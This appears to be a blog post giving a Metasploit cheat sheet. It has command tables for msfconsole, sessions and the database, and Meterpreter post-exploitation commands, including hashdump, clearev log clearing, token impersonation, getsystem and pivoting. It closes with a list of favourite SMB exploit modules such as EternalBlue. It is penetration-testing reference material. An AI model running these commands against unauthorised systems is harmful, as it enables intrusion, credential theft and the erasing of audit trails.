
Metasploit Cheat Sheet


A few months ago I created an msfvenom cheat sheet without explaining the Metasploit framework, so here is a brief cheat sheet.

Metasploit is a free framework with built-in exploit modules that aid in gaining remote access to a system by exploiting a vulnerability on that server.

General Information

| Command | Description |
| --- | --- |
| `msfconsole` | Launch program |
| `version` | Display current version |
| `msfupdate` | Pull the weekly update |
| `makerc <FILE.rc>` | Saves recent commands to file |
| `msfconsole -r <FILE.rc>` | Loads a resource file |

Executing an Exploit / Scanner / Module

| Command | Description |
| --- | --- |
| `use <MODULE>` | Set the exploit to use |
| `set payload <PAYLOAD>` | Set the payload |
| `show options` | Show all options |
| `set <OPTION> <SETTING>` | Set a setting |
| `exploit` or `run` | Execute the exploit |

Session Handling

| Command | Description |
| --- | --- |
| `sessions -l` | List all sessions |
| `sessions -i <ID>` | Interact/attach to session |
| `background` or `^Z` | Detach from session |

Using the Database

The DB saves data found during exploitation. Auxiliary scan results, hashdumps, and credentials show up in the DB.

  • First Time Setup (Run from the Linux command line.)

| Command | Description |
| --- | --- |
| `service postgresql start` | Start DB |
| `msfdb init` | Init the DB |

  • Inside msfconsole

| Command | Description |
| --- | --- |
| `db_status` | Should say connected |
| `hosts` | Show hosts in DB |
| `services` | Show ports in DB |
| `vulns` | Show all vulns found |

Meterpreter Session Commands

The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

| Command | Description |
| --- | --- |
| `sysinfo` | Show system info |
| `ps` | Show running processes |
| `kill <PID>` | Terminate a process |
| `getuid` | Show your user ID |
| `upload` / `download` | Upload / download a file |
| `lpwd` / `pwd` | Print working directory (local / remote) |
| `lcd` / `cd` | Change directory (local / remote) |
| `cat` | Show contents of a file |
| `edit <FILE>` | Edit a file (vim) |
| `shell` | Drop into a shell on the target machine |
| `migrate <PID>` | Switch to another process |
| `hashdump` | Show all pw hashes (Windows only) |
| `idletime` | Display idle time of user |
| `screenshot` | Take a screenshot |
| `clearev` | Clear the logs |

  • Escalate Privileges

| Command | Description |
| --- | --- |
| `use priv` | Load the script |
| `getsystem` | Elevate your privs |
| `getprivs` | Attempt to enable all privileges available to the current process |

  • Token Stealing (Windows only)

| Command | Description |
| --- | --- |
| `use incognito` | Load the script |
| `list_tokens -u` | Show all tokens |
| `impersonate_token DOMAIN\USER` | Use token |
| `drop_token` | Stop using token |

  • Network Pivoting

| Command | Description |
| --- | --- |
| `portfwd [add/delete] -L <LHOST> -l 3388 -r <RHOST> -p 3389` | Enable port forwarding |
| `route add <SUBNET> <MASK>` | Pivot through a session by adding a route within msf |
| `route add 192.168.0.0/24` | Pivot through a session by adding a route within msf |
| `route add 192.168.0.0/24 -d` | Deleting a route within msf |

Finding an Exploit / Payload to Use

| Command | Description |
| --- | --- |
| `search <TERM>` | Searches all exploits, payloads, and auxiliary modules |
| `show exploits` | Show all exploits |
| `show payloads` | Show all payloads |
| `show auxiliary` | Show all auxiliary modules (like scanners) |
| `show all`* | |

My favorite

| Command | Description |
| --- | --- |
| `use auxiliary/scanner/smb/smb_enumshares` | SMB Share Enumeration |
| `use auxiliary/scanner/smb/smb_ms17_010` | MS17-010 SMB RCE Detection |
| `use exploit/windows/smb/ms17_010_eternalblue` | MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption |
| `use exploit/windows/smb/ms17_010_psexec` | MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution |
| `use exploit/windows/smb/ms08_067_netapi` | MS08-067 Microsoft Server Service Relative Path Stack Corruption |
| `use exploit/windows/smb/psexec` | Microsoft Windows Authenticated User Code Execution |
| `use exploit/multi/ssh/sshexec` | SSH User Code Execution (good for using meterpreter) |
| `use post/windows/gather/arp_scanner` | Windows Gather ARP Scanner |
| `use post/windows/gather/enum_applications` | Windows Gather Installed Application Enumeration |
| `run getgui -e` | Enables RDP for Windows in meterpreter session |

External Resources

This post is licensed under CC BY 4.0 by the author.